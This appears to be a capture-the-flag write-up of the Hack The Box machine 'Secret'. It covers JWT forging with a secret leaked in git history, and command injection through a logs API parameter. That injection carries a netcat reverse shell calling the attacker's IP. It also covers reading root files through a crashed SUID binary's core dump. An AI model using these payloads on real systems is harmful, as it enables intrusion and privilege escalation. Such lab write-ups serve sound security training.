HTB: Secret

...

Intro:

This box exposes one of my biggest fears: Accidentally leaving creds in a GitHub repo!

Recon:

To start, we run nmap against our target and find open ports: 22, 80, and 3000.

We can assume port 22 won't help with anything, so we start with port 80.

This page shows us documentation for an API running on port 3000. There are a lot of token secrets scattered around that we can take note of. Perhaps the creator forgot to remove his test tokens?

Homepage of DUMBDocs on port 80

Further snooping shows us how to authenticate through this API and what we can do after authentication, but it doesn't seem like any of the provided functions are all that useful on their own.

Git-ting to the point:

Right at the bottom of the page we can download the source code for the API. After unzipping and analyzing it, we can see the inner logics of the API. More importantly, we find a .git directory! We can move into it and find the git history file, which shows that one of the revisions was done to remediate a security issue. They removed .env, which most likely held environment variables/secrets!

Git history file, revealing useful commit information

The author's personal website can be found at the footer under "Designed with <3 my Dasith" (here). From there we can move to 'Projects', then right at the bottom they links their GitHub. We find his 'auth-api' repository and go to the commit history. One of the most recent commits is a change with a comment "Update .env". Bingo! In plain view we can see the previous and new "TOKEN_SECRET" environment variable!

Exposed vs current version of the .env file

Forging JWT:

This token doesn't look like a JWT token which is required to authenticate to the API, but it may be the secret used to sign a JWT token, meaning we can go to JWT.io and create our own token [1]. For our specific needs, we want to use the HS256 alg with the JWT type (as is the default). For the payload we only need 1 field: "name":"theadmin". The reason we only need this is because in the source code, under routes/private.js, we see that the only thing the token checks for is the name field. Finally, paste the TOKEN_SECRET we found into the Verify Signature field and generate our new valid token!

Using jwt.io to create a valid token with the stolen secret; Note the circled area is where we use our stolen secret

Once we have our token, we can confirm that we have admin access by contacting the API: curl http://10.10.11.120:3000/api/priv -H "Content-Type: application/json" -H 'auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoidGhlYWRtaW4ifQ.GDRG1ileUj55S0ZdAAZhtUz28Hz4s7fHgqbiES5Qr7s' . We should get a JSON response back with a field "desc" saying "welcome back admin"! Now that we're admin, we need to figure out how to get a shell...

Getting User:

Looking back at the source code, we can see there's a route under /logs. If an admin (us) tries this url, it will run a command to get some git log files for a file that the user can supply a name for. The file name is passed as a parameter (this is a GET route) named "file".

The /logs route of the source code

To test out a simple command injection, we can start a webserver in a terminal, then try connecting to it from the target (Remember to replace the target IP with yours!):

curl -H "Content-Type: application/json" -H 'auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoidGhlYWRtaW4ifQ.GDRG1ileUj55S0ZdAAZhtUz28Hz4s7fHgqbiES5Qr7s' 'http://10.10.11.120:3000/api/logs?file=;curl%20<your ip>:8000'

Example of a successful code injection against the target API

We manage to get a connection to the python server from the target! Using this cURL, we can inject a reverse shell command. After setting up a netcat listener (nc -lvp 3184) we can run a reverse shell. The target doesn't allow the -e option for netcat, so we need to use a workaround ([3]):

rm /tmp/f
mkfifo /tmp/f  #Create a new fifo pipe
cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.14.10 3184 > /tmp/f
#Writes contents of /tmp/f to an interactive sh shell,
#then pipes that to an rshell back to us,
#where the rshell is outputting to the sh shell, creating a loop

I've taken the liberty of URL-encoding it to prevent any character errors and ensure the command is reliable:

curl -H 'auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoidGhlYWRtaW4ifQ.GDRG1ileUj55S0ZdAAZhtUz28Hz4s7fHgqbiES5Qr7s' 'http://10.10.11.120:3000/api/logs?file=;rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20<your ip>%20<your port>%20%3E%2Ftmp%2Ff'

We can check our connection with id and see that we are "Dasith", which tells us we are user and not www-data. We can then grab the user flag from /home/dasith/user.txt

Getting Root:

Once we're in (and have upgraded our terminal ;D ), we can look for our privilege escalation. The first thing I try is looking for SUID binaries with find / -perm /4000 2>/dev/null. Looking through the list, the binary that sticks out the most is /opt/count. Moving to /opt shows that there is a binary count, along with code.c and vagrant.log. Checking the vagrant log yeilded nothing but some data about a memory dump. Checking the code.c file shows some interesting results.

The source code shows a small program that reads an input file/directory, and outputs information about things such as the character count, number of files, etc... Running the count binary shows us that code.c file is it's source code. Never having exploited something like this, I take to Google where I find a single useful blog post explaining exactly how to exploit this (although in hindsight this blog might've written this as an answer to this box, so we will dig deep into how it works to prove we're actually learning) [2].

This blog explains that we can read any file as root (due to SUID bit) by running the vulnerable bin and crashing it right after it has read the binary. Doing this properly will generate a crash report along with the contents of the file that were in memory; Once the binary has read a file, if it doens't the contents from memory we can view those contents! Note: We need to put the binary in the background, which requires [ctrl+z]! If your shell isn't set up with raw throughput I'd do so now.

Step 1: Run the binary. The way ours works is by asking for a file path first, then asks if we want to save the results. We will pass the target file /root/root.txt (Which can be found using this same binary: /opt/count <<< /root) to it, and once it asks if we want to save the output, we background the binary.

Step 2: Sleep the binary and crash it. [ctrl+z] to put it in the background, then find it's PID with ps aux | grep count. We need to give it a segmentation fault in order to properly crash it. Killing it with SIGKILL or 9 would let it close cleanly, so we'll send it SIGSEGV or 11. Once we do, we bring the process back to the foreground with fg and we'll get a seg fault!

Step 3: Retrieve the crash report. On Ubuntu, there's the /var/crash directory that holds all the kernel crash reports, including the one about our count program. We can quickly make an empty directory (/tmp/miked) and use the apport-unpack command to write the crash contents to our new directory:

apport-unpack /var/crash/<your file name>.crash /tmp/miked

This will create multiple new files, but we only need CoreDump. Cat it and look for the line that looks like the flag and we're done!

Full example of how to force a crash report

The temp directory after the apport command, and the extracted flag!




Resources:

JWT builder [EXTERNAL]


SUID Core Dump [EXTERNAL]


Netcat Web Friendly




Last edit: 2022.02.27